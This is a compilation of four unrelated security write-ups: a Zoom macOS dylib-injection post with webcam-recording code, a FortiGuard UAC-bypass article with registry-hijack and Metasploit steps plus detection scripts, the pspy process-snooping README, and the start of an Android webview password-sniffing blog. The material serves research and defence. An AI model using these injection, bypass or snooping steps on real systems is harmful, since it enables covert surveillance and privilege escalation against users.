    patrick$ install_name_tool -change @rpath/libssl.1.0.0.dylib /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib

We can now confirm (via otool) that our proxy library references the original ssl library. Specifically, we note that our proxy dylib (libssl.1.0.0.dylib) contains a LC_REEXPORT_DYLIB that points to the original ssl library (_libssl.1.0.0.dylib):

    patrick$ otool -l /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib
    ...
    Load command 11
              cmd LC_REEXPORT_DYLIB
          cmdsize 96
             name /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib
       time stamp 2 Wed Dec 31 14:00:02 1969
          current version 1.0.0
    compatibility version 1.0.0

Re-running Zoom confirms that our proxy library (and the original ssl library) are both loaded, and that Zoom functions perfectly, as expected! 🔥

The appeal of injecting a library into Zoom revolves around its (user-granted) access to the mic and camera. Once our malicious library is loaded into Zoom’s process/address space, the library will automatically inherit any/all of Zoom’s access rights/permissions!

This means that if the user has given Zoom access to the mic and camera (a more than likely scenario), our injected library can equally access those devices.

📝 If Zoom has not been granted access to the mic or the camera, our library should be able to programmatically detect this (to silently 'fail').

…or we can go ahead and still attempt to access the devices, as the access prompt will originate “legitimately” from Zoom and is thus likely to be approved by the unsuspecting user.

To test this “access inheritance” I added some code to the injected library to record a few seconds of video off the webcam:

    //grab the default video capture device (the webcam)
    AVCaptureDevice* device = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeVideo];

    session = [[AVCaptureSession alloc] init];
    output = [[AVCaptureMovieFileOutput alloc] init];

    AVCaptureDeviceInput *input = [AVCaptureDeviceInput deviceInputWithDevice:device
                                                                        error:nil];

    movieFileOutput = [[AVCaptureMovieFileOutput alloc] init];

    [self.session addInput:input];
    [self.session addOutput:output];
    [self.session addOutput:movieFileOutput];

    [self.session startRunning];

    //record to a movie file
    [movieFileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"zoom.mov"]
                                 recordingDelegate:self];

    //stop recording after 5 seconds
    [NSTimer scheduledTimerWithTimeInterval:5 target:self
                                   selector:@selector(finishRecord:) userInfo:nil repeats:NO];

    ...

Normally this code would trigger an alert from macOS, asking the user to confirm access to the (mic and) camera. However, as we’re injected into Zoom (which was already given access by the user), no additional prompts are displayed, and the injected code is able to arbitrarily record audio and video.

Interestingly, the test captured the real brains behind this research:

📝 Could malware (ab)use Zoom to capture audio and video at arbitrary times (i.e. to spy on users?). If Zoom is installed and has been granted access to the mic and camera, then yes!

In fact the /usr/bin/open utility supports the -j flag, which “launches the app hidden”!

Voila!

Conclusion

Today, we uncovered two (local) security issues affecting Zoom’s macOS application. Given Zoom’s privacy and security track record this should surprise absolutely zero people.

First, we illustrated how unprivileged attackers or malware may be able to exploit Zoom’s installer to gain root privileges.

Following this, due to an ‘exception’ entitlement, we showed how to inject a malicious library into Zoom’s trusted process context. This affords malware the ability to record all Zoom meetings, or, simply spawn Zoom in the background to access the mic and webcam at arbitrary times! 😱

The former is problematic as many enterprises (now) utilize Zoom for (likely) sensitive business meetings, while the latter is problematic as it affords malware the opportunity to surreptitiously access either the mic or the webcam, with no macOS alerts and/or prompts.

OSX.FruitFly v2.0 anybody?

So, what to do? Honestly, if you care about your security and/or privacy perhaps stop using Zoom. And if using Zoom is a must, I’ve written several free tools that may help detect these attacks. 😇

First, OverSight can alert you anytime anybody accesses the mic or webcam:

Thus even if an attacker or malware is (ab)using Zoom “invisibly” in the background, OverSight will generate an alert.

Another (free) tool is KnockKnock that can generically detect proxy libraries:

…it’s almost as if offensive cyber-security research can facilitate the creation of powerful defensive tools! 🛠️ 😇

❤️ Love these blog posts and/or want to support my research and tools? You can support them via my Patreon page!

- © 2020 objective-see llc


-

Offense and Defense – A Tale of Two Sides: Bypass UAC

FortiGuard Labs Threat Analysis

Introduction

In this month’s “Offense and Defense – A Tale of Two Sides” blog, we will be walking through a new technique in sequence as it would happen in a real attack. Since I discussed downloading and executing a malicious payload with PowerShell last time, the next logical step is to focus on a technique for escalating privileges, which is why we will be focusing on the Bypass User Account Control (UAC) attack technique. Once the bad guys have managed to breach defenses and get into a system, they need to make sure they have the right permissions to complete whatever their tasks might be. One of the first obstacles they typically face is trying to bypass the UAC.

It’s important to note that, while very common, Bypass UAC is a much weaker version of a Local Privilege Escalation attack. There are much more sophisticated exploits in the wild that allow for sandbox escapes, or for gaining privileged system-level access from a device session owned by a least-privileged user. But we will save those other topics for another day.

User Account Control Review

Before we start, we will all need a basic understanding of how UAC works. UAC is an access control feature introduced with Microsoft Windows Vista and Windows Server 2008 (and is included in pretty much all Windows versions after that). The main intent of UAC is to make sure applications are limited to standard user privileges. If a user requires an increase in access privileges, the administrator of the device (usually the owner) needs to authorize that change by actively selecting a prompt-based query. We all should be familiar with this user experience.

When additional privileges are needed, a pop-up prompt asks, “Do you want to allow the following program to make changes to this computer?” If you have the full access token (i.e. you are logged in as the administrator of the device, or if you are part of the administrator’s group), you can select ‘yes’, and be on your way. If you’ve been assigned a standard user access token, however, you will be prompted to enter credentials for an administrator who does have the privileges.

Figure 1. UAC Consent Prompt


Figure 2. UAC Credential Prompt


NOTE: When you first log in to a Windows 10 machine as a non-admin user, you are granted a standard access token. This token contains information about the level of access you are being granted, including SIDs and Windows privileges. The login process for an administrator is similar. They get the same standard token as the non-admin user, but they also get an additional token that provides admin access. This explains why an administrative user is still prompted with the UAC consent prompt even though they have appropriate access privilege. It’s because the system looks at the standard access token first. If you give your consent by selecting yes, the admin access token kicks in and you are on your merry way.

The goal of this feature was to limit accidental system changes and to keep malware from compromising a system: elevating privileges requires an additional user intervention to verify that the change is what the user intended, and only trusted apps should receive admin privileges.

One other item that is important to understand is that Windows 10 protects processes by marking them with certain integrity levels. Below are the highest and lowest integrity levels.

- High Integrity (Highest) – apps that are assigned this level can make modifications to system data. Some executables may have auto-elevate abilities. I will dive into this later.

- Low Integrity (Lowest) - apps that perform a task that could be harmful to the operating system

There is much more information available out there for the UAC feature, but I think what we have covered gives us the background we need to proceed.

Bypass User Account Control

The UAC feature seems like a good measure for preventing malware from compromising a system. But unfortunately, it turns out that criminals have discovered ways to bypass the UAC feature, many of which are pretty trivial. Many of them depend on the specific UAC configuration setting. Below are a few examples of UAC bypass techniques that have been built into the open-source Metasploit tool to help you test your systems.

- UAC protection bypass using Fodhelper and the Registry Key

- UAC protection bypass using Eventvwr and the Registry Key

- UAC protection bypass using COM Handler Hijack

The first two take advantage of auto-elevation within Microsoft. If a binary is trusted – meaning it has been signed with a MS certificate and is located in a trusted directory, like c:\windows\system32 – the UAC consent prompt will not engage. Both Fodhelper.exe and Eventvwr.exe are trusted binaries. In the Fodhelper example, when that executable is run it looks for two registry keys to run additional commands. One of those registry keys can be modified, so if you put custom commands in there they run at the privilege level of the trusted fodhelper.exe file.

It’s worth mentioning that these techniques only work if the user is already in the administrator group. If you’re on a system as a standard user, it will not work. You might ask yourself, “why do I need to perform this bypass if I’m already an admin?” The answer is that if the adversary is on the box remotely, how do they select the yes button when the UAC consent prompt appears? They can’t, so the only way around it is to get around the prompt itself.

The COM handler bypass is similar, as it references specific registry (COM handler) entries that can be created and then referenced when a high integrity process is loaded. On a side note, if you want to see which executables can auto-elevate, try using the strings program, which is part of Sysinternals:

Example = strings -s c:\windows\system32\*.exe | findstr /i autoelevate
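If Sysinternals is not at hand, roughly the same check can be approximated with a short script. This is only a sketch under assumptions: it assumes the auto-elevate marker appears in the embedded manifest as an autoElevate element set to true, it reads whole files into memory, and the names has_autoelevate and scan_directory are hypothetical helpers rather than part of any tool mentioned here.

```python
import re
from pathlib import Path
from typing import List

# Matches <autoElevate>true</autoElevate>, tolerating whitespace, an optional
# XML namespace prefix, and any letter case.
_AUTOELEVATE = re.compile(
    rb"<(?:\w+:)?autoElevate[^>]*>\s*true\s*</(?:\w+:)?autoElevate>",
    re.IGNORECASE,
)


def has_autoelevate(data: bytes) -> bool:
    """Return True if the raw bytes contain an autoElevate=true marker."""
    if _AUTOELEVATE.search(data):
        return True
    # Crude handling of a UTF-16LE manifest: drop NUL bytes and retry.
    return bool(_AUTOELEVATE.search(data.replace(b"\x00", b"")))


def scan_directory(directory: str) -> List[str]:
    """List the *.exe files in `directory` that carry the marker."""
    hits = []
    for exe in sorted(Path(directory).glob("*.exe")):
        try:
            if has_autoelevate(exe.read_bytes()):
                hits.append(exe.name)
        except OSError:
            continue  # unreadable or locked file; skip it
    return hits


if __name__ == "__main__":
    for name in scan_directory(r"c:\windows\system32"):
        print(name)
```

The resulting list is a starting point for monitoring: these are the binaries whose launches and registry lookups deserve extra attention.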

As I mentioned, there are many more bypass UAC techniques. If you want to explore more, which I think you should do to ensure you’re protected against them, or at least can detect them, you can start at this GitHub site (UACMe).

Defenses against Bypass UAC

Now that we understand that bypassing the UAC controls is possible, let’s talk about defenses you have against these attacks. You have four settings for User Account Control in Windows 7/10. The settings options are listed below.

- Always notify: Probably the most secure setting. If you select this, it will always notify you when you make changes to your system, such as installing software programs or when you are making direct changes to Windows settings. When the UAC prompt is displayed, other tasks are frozen until you respond.

- Notify me only when programs try to make changes to my computer: This setting is similar to the first. It will notify you when installing software programs and will freeze all other tasks until you respond to the prompt. However, it will not notify you when you make changes to Windows settings yourself.

- Notify me only when programs try to make changes to my computer (do not dim my desktop): As the setting name suggests, it behaves the same as the one above, except that when the UAC consent prompt appears, other tasks on the system will not freeze.

- Never notify (Disable UAC): I think it’s obvious what this setting does. It disables User Account Control.

The default setting for UAC is “Notify me only when programs try to make changes to my computer.” I mention this because some attack techniques will not work if you have UAC set to “Always notify.” A word to the wise.
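To audit which of the four settings a machine is actually using, the slider position can be inferred from registry values. The sketch below is an assumption-laden illustration: the value names ConsentPromptBehaviorAdmin, PromptOnSecureDesktop and EnableLUA (under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System) and the numeric mapping come from my understanding of Windows, not from this article, and the function name uac_slider_level is hypothetical. Reading the values (for example with reg query) is left out so the mapping itself stays easy to check.

```python
def uac_slider_level(consent_prompt_behavior_admin: int,
                     prompt_on_secure_desktop: int,
                     enable_lua: int = 1) -> str:
    """Map UAC policy registry values to the slider setting names above."""
    if enable_lua == 0:
        # UAC is switched off entirely, regardless of the other values.
        return "UAC disabled"
    # Assumed mapping of (ConsentPromptBehaviorAdmin, PromptOnSecureDesktop).
    table = {
        (2, 1): "Always notify",
        (5, 1): "Notify me only when programs try to make changes to my computer",
        (5, 0): "Notify me only when programs try to make changes to my computer"
                " (do not dim my desktop)",
        (0, 0): "Never notify",
    }
    key = (consent_prompt_behavior_admin, prompt_on_secure_desktop)
    return table.get(key, "Custom (not a slider position)")


# Values found on a default installation, under the assumed mapping.
print(uac_slider_level(5, 1))
```

Anything other than "Always notify" leaves room for the auto-elevation based bypasses described earlier, so the result is useful as a quick hardening check.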

Another great defense for this technique is to simply not run as administrator. Even if you own the device, work as a standard user and elevate privileges as needed when performing tasks that require them. This sounds like a no-brainer, but many organizations still provide admin privileges to all users. The reasoning is usually because it’s easier. That’s true, but it’s also easier for the bad guys as well.

Privilege escalation never really happens as a single event. It involves multiple techniques chained together, each dependent on the previous one executing successfully. So with that in mind, the best way to break the attack chain is to prevent any of these techniques from successfully completing, and the best place to do this is usually in the execution tactic category or earlier, at delivery. If the adversary cannot get a foothold on the box, they certainly are not going to be able to execute a bypass UAC technique.

If you’re interested in learning more about technique chaining and dependencies, Andy Applebaum created a nice presentation given at the First Conference that you might want to take a look at.

One common question people ask is, “why are there no CVEs for these UAC security bypass attacks?” It’s because Microsoft doesn’t consider UAC to be a security boundary, so you will not see fixes for them in the regular Patch Tuesday releases.

Real-World Examples & Detections

Over the years, our FortiGuard Labs team has discovered many threats that include a bypass UAC technique. A great example is a threat we discovered a few years back that contained the Fareit malware. A Fareit payload typically steals credentials and downloads other payloads. This particular campaign was delivered via a phishing email containing a malicious macro that called a PowerShell script to download a file named sick.exe. This seems like a typical attack strategy, but to execute the sick.exe payload it used the high integrity (auto-elevated) eventvwr.exe to bypass the UAC consent prompt. Below is the PowerShell script.

Figure 3. PowerShell Script


You can see that the first part of the script downloads the malicious file using the (New-object System.net.webclient).Downloadfile() method we discussed in the first blog in this series. The second part of the script adds an entry to the registry using the command reg add HKCU\Software\Classes\mscfile\shell\open\command /d %tmp%\sick.exe /f.

Figure 4. Registry Modified by PowerShell Script


Finally, the last command in the script runs the eventvwr.exe, which needs to run MMC. As I discussed earlier, the exe has to query both the HKCU\Software\Classes\mscfile\shell\open\command\ and HKCR\mscfile\shell\open\command\. When it does so, it will find sick.exe as an entry and will execute that instead of the MMC.
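The registry lookup described above suggests a simple detection: flag any write to the per-user mscfile\shell\open\command key. The sketch below assumes you already have registry event paths as strings (for example from an endpoint log). The function name is_eventvwr_hijack and the accepted hive prefixes are illustrative assumptions, and real logs may format the path differently.

```python
# Key fragment taken from the text: the per-user handler that eventvwr.exe
# consults before falling back to the machine-wide one.
_HIJACK_FRAGMENT = "\\mscfile\\shell\\open\\command"

# Per-user hives, in short and long notation (assumed log formats).
_PER_USER_PREFIXES = ("hkcu\\", "hkey_current_user\\", "hku\\", "hkey_users\\")


def is_eventvwr_hijack(target_object: str) -> bool:
    """Return True if a registry path points at the per-user mscfile handler."""
    path = target_object.strip().replace("/", "\\").lower()
    return path.startswith(_PER_USER_PREFIXES) and _HIJACK_FRAGMENT in path


events = [
    r"HKCU\Software\Classes\mscfile\shell\open\command",
    r"HKLM\Software\Classes\mscfile\shell\open\command",
    r"HKCU\Software\Classes\txtfile\shell\open\command",
]
for event in events:
    print(event, "->", is_eventvwr_hijack(event))
```

Only the first path is flagged. The design choice is to key on the per-user hive: a value appearing there is unusual on its own, which keeps the rule simple, at the cost of missing bypasses that use other keys.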

Our 24/7 FortiResponder Managed Detection and Response team also sees a good amount of bypass UAC activity in our customers’ environments. Usually, the threat is stopped earlier in the attack chain, before it has a chance to run the technique, but there are occasions when it is able to progress beyond that point. We also observe it if the FortiEDR configuration is in simulation mode.

A recent technique we detected and blocked was a newer version of Trickbot. When this payload runs it tries to execute the WSReset UAC Bypass technique to circumvent the UAC prompt. Once again, it leverages an executable that has higher integrity (and higher privilege) and has the autoElevate property enabled. This specific bypass works on Windows 10. If the payload encounters Windows 7, it will instead use the CMSTPLUA UAC bypass technique. In Figure 5 you can see our FortiEDR forensic technology identifying reg.exe trying to modify the registry value with DelegateExecute.

Figure 5. FortiEDR technology detecting a bypass UAC technique


Our FortiSIEM customers can take advantage of rules to detect some of these UAC bypass techniques. Below is an example rule to detect a UAC bypass using the Windows backup tool sdclt.exe and the Eventvwr version we mentioned before.

Figure 6. FortiSIEM rule to detect some Bypass UAC techniques


Below, in Figure 7, we can see the sub-patterns for the rule detecting the eventvwr Bypass UAC version.

Figure 7. FortiSIEM SubPattern to detect Bypass UAC technique using eventvwr.exe


If you’re not using a technology like FortiEDR or FortiSIEM, you could start monitoring on your own (using sysmon). But again, it could be difficult since there are so many variations. In general, you can look for registry changes or additions in certain areas and the auto-elevated files being used, depending on the specific bypass UAC technique. For the eventvwr.exe version you could look for new entries in HKCU\Software\Classes. Also keep an eye on the consent.exe file since it’s the one that launches the User Interface for UAC. Look at the time between the start and the end of the consent process. If it’s milliseconds, it’s not being done by a human but by an automated process. Lastly, when looking at the entire UAC process, a legitimate execution is usually much simpler in nature, whereas the bypass UAC process is a bit more complex or noisy in the logs.
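The consent.exe timing heuristic can be expressed in a few lines. This is a sketch only: the one-second threshold is an arbitrary assumption that would need tuning, the timestamp format is assumed to be "YYYY-MM-DD HH:MM:SS.mmm", and the names consent_duration and looks_automated are hypothetical. Pairing the process start and end events for the same consent.exe instance is left to your log pipeline.

```python
from datetime import datetime, timedelta

TIME_FORMAT = "%Y-%m-%d %H:%M:%S.%f"   # assumed log timestamp layout
HUMAN_THRESHOLD = timedelta(seconds=1)  # assumed cut-off; tune for your data


def consent_duration(start: str, end: str) -> timedelta:
    """Return how long one consent.exe instance lived."""
    started = datetime.strptime(start, TIME_FORMAT)
    ended = datetime.strptime(end, TIME_FORMAT)
    if ended < started:
        raise ValueError("end time precedes start time")
    return ended - started


def looks_automated(start: str, end: str,
                    threshold: timedelta = HUMAN_THRESHOLD) -> bool:
    """Flag consent prompts that closed faster than a human could react."""
    return consent_duration(start, end) < threshold


# A prompt that lived for 40 ms versus one that stayed open for 3.8 s.
print(looks_automated("2020-04-02 10:15:30.100", "2020-04-02 10:15:30.140"))
print(looks_automated("2020-04-02 10:15:30.100", "2020-04-02 10:15:33.900"))
```

The first call reports an automated-looking prompt and the second does not. On its own this signal is weak, so it works best combined with the registry indicators mentioned above.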

You will have to do a lot of research to figure out the right rules to trigger on. It’s probably better to just get a technology that can help prevent or detect the technique.

This should save you a lot of time and personnel overhead.

Reproducing the Techniques

Once you’ve done your research on the technique, it’s time to figure out how to reproduce it so you can figure out whether or not you detect it. Some of the same tools apply as I mentioned last time, but there are a few that are fairly easy to use. Below are a few examples.

Simulation Tool

Atomic Red Team has some very basic tests you can use to simulate a UAC bypass. Figure 8, below, lists them.

Figure 8. A list of Bypass UAC tests


Open Source Defense Testing Tool

As I mentioned earlier, Metasploit has a few bypass UAC techniques you can leverage. Remember that in the attack chain your adversary already has an initial foothold on the box, and they are trying to get around UAC. With that said, you should already have a meterpreter session running on your test box. Executing the steps to run a bypass UAC (using fodhelper) technique is pretty simple.

First, put your meterpreter session in the background by typing the command background. Next, type use exploit/windows/local/bypassuac_fodhelper. From there you need to add your meterpreter session to use the exploit. Type in set session <your session #> and then type exploit. If you’re successful, you should have something on your screen that looks like what’s shown in figure 9, below.

Figure 9. Successful bypass UAC using fodhelper file.


Lastly, in video 1 below, I walk you through a bypass UAC technique available in Metasploit. I have established initial access and ended up with a meterpreter session. From there I try to add a registry entry for persistence, but I don’t have the right access. So I try to run the getsystem command, but that fails as well. This is usually because UAC is enabled. I then select one of the bypass UAC techniques, which allows me to elevate my privileges and add my persistence entry to the registry.

Conclusion

Once again, we continue to play the cat and mouse game. As an industry we build protections (in this case UAC) and eventually the adversary finds ways around them. This will most likely not change. So the important task is understanding your strengths and weaknesses against these real-world attacks. If you struggle with keeping up to date with all of this, you can always turn to your consulting partner or vendor to make sure you have the right security controls and services in place to keep up with the latest threats, and that you are also able to address the risk and identify malicious activities using such tools as EDR, MDR, UEBA and SIEM technologies.

I will close this blog like I did last time. As you go through the process of testing each Bypass UAC attack technique, it is important to not only understand the technique, but also be able to simulate it. Then, monitor your security controls, evaluate if any gaps exist, and document and make improvements needed for coverage.

Stay tuned for our next MITRE ATT&CK technique blog - Credential Dumping.


-

pspy - unprivileged Linux process snooping

pspy is a command line tool designed to snoop on processes without the need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate to your colleagues why passing secrets as arguments on the command line is a bad idea.

The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
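The procfs scan itself is easy to picture in code. The sketch below is not pspy's implementation (pspy is a separate tool, and its inotify-triggered scanning is not reproduced here). It only illustrates the scan-and-diff step: take two snapshots of /proc and report the PIDs that appeared in between. The function names snapshot and new_processes are hypothetical.

```python
import os
from typing import Dict


def snapshot(proc_root: str = "/proc") -> Dict[int, str]:
    """Map each visible PID to its command line, read from procfs."""
    procs = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # skip non-process entries such as "self" or "meminfo"
        try:
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as fh:
                raw = fh.read()
        except OSError:
            continue  # the process exited between listdir() and open()
        # Arguments are NUL-separated in /proc/<pid>/cmdline.
        procs[int(entry)] = raw.replace(b"\x00", b" ").decode(errors="replace").strip()
    return procs


def new_processes(before: Dict[int, str], after: Dict[int, str]) -> Dict[int, str]:
    """Return the processes present in `after` but not in `before`."""
    return {pid: cmd for pid, cmd in after.items() if pid not in before}


if __name__ == "__main__":
    import time

    seen = snapshot()
    while True:
        time.sleep(0.1)  # plain polling stands in for the inotify trigger
        current = snapshot()
        for pid, cmd in sorted(new_processes(seen, current).items()):
            print(f"CMD: PID={pid} | {cmd}")
        seen = current
```

Plain polling like this misses processes that start and exit between two scans, which is exactly the gap the inotify-triggered scans are meant to narrow.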

Getting started

Download

Get the tool onto the Linux machine you want to inspect. First get the binaries. Download the released binaries here:

- 32 bit big, static version: pspy32 (download)

- 64 bit big, static version: pspy64 (download)

- 32 bit small version: pspy32s (download)

- 64 bit small version: pspy64s (download)

The statically compiled files should work on any Linux system but are quite huge (~4MB). If size is an issue, try the smaller versions which depend on libc and are compressed with UPX (~1MB).

Build

Either use Go installed on your system or run the Docker-based build process that was used to create the release. For the latter, ensure Docker is installed, and then run make build-build-image to build a Docker image, followed by make build to build the binaries with it.

You can run pspy --help to learn about the flags and their meaning. The summary is as follows:

- -p: enables printing commands to stdout (enabled by default)

- -f: enables printing file system events to stdout (disabled by default)

- -r: list of directories to watch with Inotify. pspy will watch all subdirectories recursively (by default, watches /usr, /tmp, /etc, /home, /var, and /opt).

- -d: list of directories to watch with Inotify. pspy will watch these directories only, not the subdirectories (empty by default).

- -i: interval in milliseconds between procfs scans. pspy scans regularly for new processes regardless of Inotify events, just in case some events are not received.

- -c: print commands in different colors. File system events are not colored anymore, commands have different colors based on process UID.

- --debug: prints verbose error messages which are otherwise hidden.

The default settings should be fine for most applications. Watching files inside /usr is most important since many tools will access libraries inside it.

Some more complex examples:

    # print both commands and file system events and scan procfs every 1000 ms (=1sec)
    ./pspy64 -pf -i 1000

    # place watchers recursively in two directories and non-recursively into a third
    ./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir

    # disable printing discovered commands but enable file system events
    ./pspy64 -p=false -f

Examples

Cron job watching

To see the tool in action, just clone the repo and run make example (Docker needed). It is well known that passing passwords as command line arguments is not safe, and the example can be used to demonstrate it. The command starts a Debian container in which a secret cron job, run by root, changes a user password every minute. pspy runs in the foreground, as user myuser, and scans for processes. You should see output similar to this:

    ~/pspy (master) $ make example
    [...]
    docker run -it --rm local/pspy-example:latest
    [+] cron started
    [+] Running as user uid=1000(myuser) gid=1000(myuser) groups=1000(myuser),27(sudo)
    [+] Starting pspy now...
    Watching recursively : [/usr /tmp /etc /home /var /opt] (6)
    Watching non-recursively: [] (0)
    Printing: processes=true file-system events=false
    2018/02/18 21:00:03 Inotify watcher limit: 524288 (/proc/sys/fs/inotify/max_user_watches)
    2018/02/18 21:00:03 Inotify watchers set up: Watching 1030 directories - watching now
    2018/02/18 21:00:03 CMD: UID=0 PID=9 | cron -f
    2018/02/18 21:00:03 CMD: UID=0 PID=7 | sudo cron -f
    2018/02/18 21:00:03 CMD: UID=1000 PID=14 | pspy
    2018/02/18 21:00:03 CMD: UID=1000 PID=1 | /bin/bash /entrypoint.sh
    2018/02/18 21:01:01 CMD: UID=0 PID=20 | CRON -f
    2018/02/18 21:01:01 CMD: UID=0 PID=21 | CRON -f
    2018/02/18 21:01:01 CMD: UID=0 PID=22 | python3 /root/scripts/password_reset.py
    2018/02/18 21:01:01 CMD: UID=0 PID=25 |
    2018/02/18 21:01:01 CMD: UID=??? PID=24 | ???
    2018/02/18 21:01:01 CMD: UID=0 PID=23 | /bin/sh -c /bin/echo -e "KI5PZQ2ZPWQXJKEL\nKI5PZQ2ZPWQXJKEL" | passwd myuser
    2018/02/18 21:01:01 CMD: UID=0 PID=26 | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root
    2018/02/18 21:01:01 CMD: UID=101 PID=27 |
    2018/02/18 21:01:01 CMD: UID=8 PID=28 | /usr/sbin/exim4 -Mc 1enW4z-00000Q-Mk

First, pspy prints all currently running processes, each with PID, UID and the command line. When pspy detects a new process, it adds a line to this log. In this example, you find a process with PID 23 which seems to change the password of myuser. This is the result of a Python script used in root's private crontab /var/spool/cron/crontabs/root, which executes this shell command (check crontab and script). Note that myuser can see neither the crontab nor the Python script. With pspy, myuser can see the commands nevertheless.

CTF example from Hack The Box

Below is an example from the machine Shrek from Hack The Box. In this CTF challenge, the task is to exploit a hidden cron job that's changing ownership of all files in a folder. The vulnerability is the insecure use of a wildcard together with chown (details for the interested reader). It requires substantial guesswork to find and exploit it. With pspy though, the cron job is easy to find and analyse:

How it works

Tools exist to list all processes executed on Linux systems, including those that have finished. For instance there is forkstat. It receives notifications from the kernel on process-related events such as fork and exec.

These tools require root privileges, but that should not give you a false sense of security. Nothing stops you from snooping on the processes running on a Linux system. A lot of information is visible in procfs as long as a process is running. The only problem is you have to catch short-lived processes in the very short time span in which they are alive. Scanning the /proc directory for new PIDs in an infinite loop does the trick but consumes a lot of CPU.

A stealthier way is to use the following trick. Processes tend to access files such as libraries in /usr, temporary files in /tmp, log files in /var, ... Using the inotify API, you can get notifications whenever these files are created, modified, deleted, accessed, etc. Linux does not require privileged users for this API since it is needed for many innocent applications (such as text editors showing you an up-to-date file explorer). Thus, while non-root users cannot monitor processes directly, they can monitor the effects of processes on the file system.

We can use the file system events as a trigger to scan /proc, hoping that we can do it fast enough to catch the processes. This is what pspy does. There is no guarantee you won't miss one, but chances seem to be good in my experiments. In general, the longer the processes run, the bigger the chance of catching them is.

Misc

Logo: "By Creative Tail [CC BY 4.0 (http://creativecommons.org/licenses/by/4.0)], via Wikimedia Commons" (link)


-



Android Webview Exploited

How an android app can bypass CSP, iframe sandbox attributes, etc. to compromise the page getting loaded in the webview despite the classic protections in place.

qreoct

24 Mar 2020 • 20 min read

There are plenty of articles explaining the security issues with android webview, like this article & this one. Many of these resources talk about the risks that an untrusted page, loaded inside a webview, poses to the underlying app. The threats become more prominent especially when javascript and/or the javascript interface is enabled on the webview.

In short, having javascript enabled & not properly fortified allows for execution of arbitrary javascript in the context of the loaded page, making it quite similar to any other page that may be vulnerable to an XSS. And again, very simply put, having the javascript interface enabled allows for potential code execution in the context of the underlying android app.

In many of the resources that I came across, the victim was the underlying android app, inside whose webview a page would open either from its own domain or from an external source/domain. The attacker was an entity external to the app, like an actor exploiting a potential XSS on the page loaded from the app's domain (or the third party domain, from where the page is being loaded inside the webview, itself acting maliciously). The attack vector was the vulnerable/malicious page loaded in the webview.

This blog talks about a different attack scenario!

Victim: Not the underlying android app, but the page itself that is being loaded in the webview.

Attacker: The underlying android app, in whose webview the page is being loaded.

Attack vector: The vulnerable/malicious page loaded in the webview (through the abuse of the insecure implementations of some APIs).

The story line

A certain product needs to integrate with a huge business. Let us call this huge business as



BullyGiant& the certain product asAppAwesomefrom this point on.Many users have an account on both AppAwesome & also on BullyGiant. The flow involves such users of BullyGiant to check out on their payments page with AppAwesome. Every transaction on AppAwesome requires to be authenticated & authorized by the user by entering their password on the AppAwesome's checkout page, which appears before any transaction is allowed to go through.

AppAwesome cares about the security of it's customers. So it proposes the below security measures to anyone who wants to integrate with them, especially around AppAwesome's checkout page.

- Loading of the checkout page using AppAwesome's SDK. All of the page & it's contents are sandboxed & controlled by the SDK. This approach allows for maximum security & the best user experience.

- Loading of the checkout page on the underlying browser (or custom chrome tabs, if available). This approach again has quite decent security (limited by of course the underlying browser's security) but not a very good user experience.

- Loading of the checkout page in the webview of the integrating app. This is comparatively the most insecure of the above proposals, although offers a better user experience than the second approach mentioned above.

Now the deal is that AppAwesome is really very keen on securing their own customers' financial data & hence very strongly recommends usage of their SDK. BullyGiant on the other hand, for some reason, (hopefully justified) does not really want to abide by the secure integration proposals by AppAwesome. AppAwesome does have a choice to deny any integration with BullyGiant. However, this integration is really crucial for AppAwesome to provide a superior user experience to it's own users & in fact even more crucial for AppAwesome to stay in the game.

So AppAwesome gives in & agrees to integrate with BullyGiant succumbing to their terms of integration, i.e. using the least secure webview approach. The only things that protect AppAwesome's customers now is the trust that AppAwesome has on BullyGiant, which is somewhat also covered through the legal contracts between AppAwesome & BullyGiant. That's all.

Technical analysis (TL;DR)

Thanks: Badshah & Anoop for helping with the execution of the attack idea. Without your help, this blog post would not have been possible, at least not while it's still relevant

Below is a tech analysis of why webview is a bad idea. It talks about how a rogue (or compromised) app can abuse webview features to extract sensitive data from the page loaded inside the webview, despite the many security mechanisms that the page being loaded in the webview might have implemented. We discuss in detail, with many demos, how CSP, iframe sandbox etc. may be bypassed in android webview. Every single demo has a linked code base on my Github so they could be tried out first hand. Also, the below generic scheme is followed (not strictly in that order) throughout the blog:

- A simple demo of the underlying concepts on the browser & android webview

- Addition of security features to the underlying concepts & then demo of the same on the browser & android webview

NB: Please ignore all other potential security issues that might be there with the code base/s

Case 1: No protection mechanisms

Apps used in this section:







AppAwesome when accessed from a normal browser:

Vanilla AppAwesome Landing Page - Browser



And on submitting the above form:

Vanilla AppAwesome Checkout Page - Browser





AppAwesome when accessed from BullyGiant app:



Vanilla AppAwesome Page - Android Webview

Notice the Authenticate Payment web page is loaded inside a webview of the BullyGiant app.



And on submitting the form above:



Vanilla AppAwesome Page - Android Webview



Notice that clicking on the







Submitbutton also displays the content of the password field as atoast messageon BullyGiant. This proves how the underlying app may be able to sniff any data (sensitive or otherwise) from the page loaded in it's webview.Under the BullyGiant hood

The reason BullyGiant was able to sniff the password field out of the webview is that it is in total control of its own webview & hence can change the webview's properties, listen to events etc. That is exactly what it is doing. It is

- enabling javascript on its webview &

- then listening for the onPageFinished event

Snippet from BullyGiant:

```java
...
final WebView mywebview = (WebView) findViewById(R.id.webView);
mywebview.clearCache(true);
mywebview.loadUrl("http://192.168.1.38:31337/home");
mywebview.getSettings().setJavaScriptEnabled(true);
mywebview.setWebChromeClient(new WebChromeClient());
mywebview.addJavascriptInterface(new AppJavaScriptProxy(this), "androidAppProxy");
mywebview.setWebViewClient(new WebViewClient(){
    @Override
    public void onPageFinished(WebView view, String url) {...}
...
```

